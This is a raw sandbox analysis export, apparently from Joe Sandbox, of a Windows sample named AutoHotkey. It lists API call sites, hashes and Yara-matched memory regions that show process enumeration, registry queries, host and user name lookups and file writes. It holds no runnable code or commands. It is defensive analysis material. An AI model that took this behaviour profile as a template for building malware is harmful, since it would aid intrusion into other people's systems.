                                        • Part of subcall function 0049A18D: RtlFreeHeap.NTDLL(00000000,00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1A3
                                        • Part of subcall function 0049A18D: GetLastError.KERNEL32(00000000,?,0049DF53,00000000,?,0049F727,?,0047FFCE), ref: 0049A1B5
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountErrorFreeHeapLastTickTimer_free
                                      • String ID:
                                      • API String ID: 2937406964-0
                                      • Opcode ID: 19e9682df60a7aa0ab44984f32fbf0816d0052ea2be4ac951366ee02a7b41340
                                      • Instruction ID: fbe660ab59d1c16caad6faaf06460ae0cd23b714aefe5515e173963e903f2271
                                      • Opcode Fuzzy Hash: 19e9682df60a7aa0ab44984f32fbf0816d0052ea2be4ac951366ee02a7b41340
                                      • Instruction Fuzzy Hash: A7315BB1509240DFD710DF25E884B9B7BE5BB84708F098A2FF88596250E738D949CB5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _free.LIBCMT ref: 00466490
                                      • GetTickCount.KERNEL32 ref: 004664C9
                                      • SetTimer.USER32(0002044A,0000000D,00002710,00446BB0), ref: 004664FF
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTickTimer_free
                                      • String ID:
                                      • API String ID: 4185866143-0
                                      • Opcode ID: bbc31d1e325bd0e862d4c5195a027f65ddc92fb53bac4f826f21b41502aa6c99
                                      • Instruction ID: 965edcf29228e748a8bce1cae2abfd0d5af824b2297bd87d49fc2bfde01b466b
                                      • Opcode Fuzzy Hash: bbc31d1e325bd0e862d4c5195a027f65ddc92fb53bac4f826f21b41502aa6c99
                                      • Instruction Fuzzy Hash: 693169B1509240DFD710DF25E884B9BBBE5EB84708F08892FF88596250EB38D945CB9B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020119,?,?,?,?,?,04871722,?,00000000,04871885,?,?,00000000), ref: 048750B7
                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,80000002,00000000,00000000,00020119,?,?,?,?,?,04871722), ref: 048750DE
                                      • RegCloseKey.ADVAPI32(?,80000002,00000000,00000000,00020119,?,?,?,?,?,04871722,?,00000000,04871885), ref: 04875103
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: 74b2d28ce19a860730b65e831c662c2118fa86ed3135638d7fc046ceee5fbe1f
                                      • Instruction ID: ba853a9cda2ff4af5f8c4d2d93cb48311aafaa4850d099a3c276c64dc7276c6d
                                      • Opcode Fuzzy Hash: 74b2d28ce19a860730b65e831c662c2118fa86ed3135638d7fc046ceee5fbe1f
                                      • Instruction Fuzzy Hash: 5E113371A0021C7BDB10EE9DDC81EEEB3ACAB48315F004A75EA14D7240E7B0AA4547A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621,?,?,?,00000001), ref: 048745E2
                                      • WriteFile.KERNEL32(00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 048745FA
                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000000,048746A2,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,04874621), ref: 04874606
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleWrite
                                      • String ID:
                                      • API String ID: 1065093856-0
                                      • Opcode ID: 096b4bf337662dd24fe8b8ec3481f46f1df1887deb03310bd003a285ce157e95
                                      • Instruction ID: 5e318058a835d626c74daadaf24fffc54665d53fab38422bf4dcdab47144b48c
                                      • Opcode Fuzzy Hash: 096b4bf337662dd24fe8b8ec3481f46f1df1887deb03310bd003a285ce157e95
                                      • Instruction Fuzzy Hash: E801B171604308BFF721AAAC8C92FAEB7ACDB85F18F614F75B510E25D0D7B4AD004965
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetErrorMode.KERNELBASE(00000001,?,?,?,?,00404316), ref: 00404256
                                        • Part of subcall function 0044B8F0: GetCurrentDirectoryW.KERNEL32(00008000,00404316,?,00404263,?,?,?,?,00404316), ref: 0044B907
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryErrorMode
                                      • String ID: Out of memory.
                                      • API String ID: 3557233301-4087320997
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000000,?,?,?,?,0485BD21,00000000,0485C1F0,?,?,00000000,00000000), ref: 04875E7B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID: GetFileAttributesA
                                      • API String ID: 3188754299-811605020
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateDirectoryA.KERNELBASE(00000000,00000000,?,?,?,?,0487595B,00000000,04875973,?,?,?,?,04874FE2,?,048685A4), ref: 048758F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID: CreateDirectoryA
                                      • API String ID: 4241100979-2169353901
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TerminateProcess.KERNELBASE(00000000,00000000,?,00000001,04875243,0486DF05,00000000,00000000,00000002,00000000,00000000,00000000,00000002,00000000,0486E219,00000000), ref: 04875762
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID: TerminateProcess
                                      • API String ID: 560597551-2873147277
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,00000000,004AC858,000000FF,00408718,?,?,00004001,00000001,0000030C), ref: 004041FA
                                      • _free.LIBCMT ref: 00404215
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification_free
                                      • String ID:
                                      • API String ID: 2993663561-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysFreeString.OLEAUT32 ref: 048455D7
                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 048456C8
                                      • SysFreeString.OLEAUT32(00000000), ref: 048456DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$Free$Alloc
                                      • String ID:
                                      • API String ID: 986138563-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,04842498), ref: 04842134
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,04842498), ref: 0484215B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetComputerNameW.KERNEL32(?,00000011), ref: 048720C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ComputerName
                                      • String ID:
                                      • API String ID: 3545744682-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _malloc.LIBCMT ref: 0047D6DD
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_malloc
                                      • String ID:
                                      • API String ID: 501242067-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0049A782: _malloc.LIBCMT ref: 0049A79C
                                      • _malloc.LIBCMT ref: 0047D04D
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap
                                      • String ID:
                                      • API String ID: 680241177-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 048464BF
                                        • Part of subcall function 04846735: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 04846750
                                        • Part of subcall function 04846735: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484676E
                                        • Part of subcall function 04846735: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0484678C
                                        • Part of subcall function 04846735: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 048467AA
                                        • Part of subcall function 04846735: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 048467F3
                                        • Part of subcall function 04846735: RegQueryValueExA.ADVAPI32(?,048469B5,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,04846839,?,80000001), ref: 04846811
                                        • Part of subcall function 04846735: RegCloseKey.ADVAPI32(?,04846840,00000000,00000000,00000005,00000000,04846839,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 04846833
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open$FileModuleNameQueryValue$Close
                                      • String ID:
                                      • API String ID: 2796650324-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CharLowerBuffA.USER32(00000000,00000000,?,00000000,00000000,0487C718,00000000,0487C758), ref: 04848C1B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BuffCharLower
                                      • String ID:
                                      • API String ID: 2358735015-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0485B92D: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,0485BBB4,?,?,048742C9,00000000,048743A7,?,?,?,?,?,0485BCFA,00000000,0485C1F0), ref: 0485B941
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0485B959
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0485B96B
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0485B97D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0485B98F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0485B9A1
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0485B9B3
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0485B9C5
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0485B9D7
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0485B9E9
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0485B9FB
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0485BA0D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0485BA1F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0485BA31
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0485BA43
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0485BA55
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0485BA67
                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0485BBBA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 2242398760-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0485B92D: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,0485BBB4,?,?,048742C9,00000000,048743A7,?,?,?,?,?,0485BCFA,00000000,0485C1F0), ref: 0485B941
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0485B959
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0485B96B
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0485B97D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0485B98F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0485B9A1
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0485B9B3
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0485B9C5
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0485B9D7
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0485B9E9
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0485B9FB
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0485BA0D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0485BA1F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0485BA31
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0485BA43
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0485BA55
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0485BA67
                                      • Process32First.KERNEL32(?,00000128), ref: 0485BBDA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$FirstHandleModuleProcess32
                                      • String ID:
                                      • API String ID: 2774106396-0
                                      • Opcode ID: 1c327ee816d43d967800f9eba1689b28ffc3b4a1c0ec697c8c5bb44fc0db80f8
                                      • Instruction ID: edd442dc1d61911ee2662ffb47a610db504ceab50f08e980de23d402722686b5
                                      • Opcode Fuzzy Hash: 1c327ee816d43d967800f9eba1689b28ffc3b4a1c0ec697c8c5bb44fc0db80f8
                                      • Instruction Fuzzy Hash: E1C080D2702130179F1075F87C848D3974CCD450B73140E62F905D3121E2BDAC119190
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0485B92D: GetModuleHandleA.KERNEL32(kernel32.dll,0000000F,0485BBB4,?,?,048742C9,00000000,048743A7,?,?,?,?,?,0485BCFA,00000000,0485C1F0), ref: 0485B941
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0485B959
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0485B96B
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0485B97D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0485B98F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0485B9A1
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0485B9B3
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32First), ref: 0485B9C5
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0485B9D7
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0485B9E9
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0485B9FB
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0485BA0D
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0485BA1F
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32First), ref: 0485BA31
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0485BA43
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0485BA55
                                        • Part of subcall function 0485B92D: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0485BA67
                                      • Process32Next.KERNEL32(?,00000128), ref: 0485BBFA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModuleNextProcess32
                                      • String ID:
                                      • API String ID: 2237597116-0
                                      • Opcode ID: 9772b48aa848a77e8a74ef99842b3ebcf776504417bb2148da5c854e9d8a6f59
                                      • Instruction ID: 447c693fd48db06537cd97f43d8923c5d456c41880814a9f25f9fb697468ab28
                                      • Opcode Fuzzy Hash: 9772b48aa848a77e8a74ef99842b3ebcf776504417bb2148da5c854e9d8a6f59
                                      • Instruction Fuzzy Hash: 59C080D2612534176E1065F87C844D7874CCD891B73140DA2B905D3111E65D9C119190
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesA.KERNEL32(00000000,?,04875A37,00000000,04875A4F,?,?,?,?,04875A8D,00000000,04875AA5,?,?), ref: 048759D4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 4bff137de83b8da908ac2e645cc3fa487c90a569a2b7e9bb4e3bb2d98164668f
                                      • Instruction ID: 5a3591a9c385c4e2b4093360273e8c7314a5bb91c567a721b0bf7c787aa674b6
                                      • Opcode Fuzzy Hash: 4bff137de83b8da908ac2e645cc3fa487c90a569a2b7e9bb4e3bb2d98164668f
                                      • Instruction Fuzzy Hash: E0C08CE2206204276F1069BC3CE928A028849851393341F26F068C69F2F362F4272011
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 04842342
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 862a36a0d576227c065ec1202f17d487326ccd546f91bfc3d07402c75df67cff
                                      • Instruction ID: 1c70ab5028804c8cbf62bb7a77e1c3e782eb90b1185cccf94821a967a31c875b
                                      • Opcode Fuzzy Hash: 862a36a0d576227c065ec1202f17d487326ccd546f91bfc3d07402c75df67cff
                                      • Instruction Fuzzy Hash: 6021AFB560824A9FD750CF2CC884A5AB7F4FF88354F148E69F999CB354E330E9548B52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
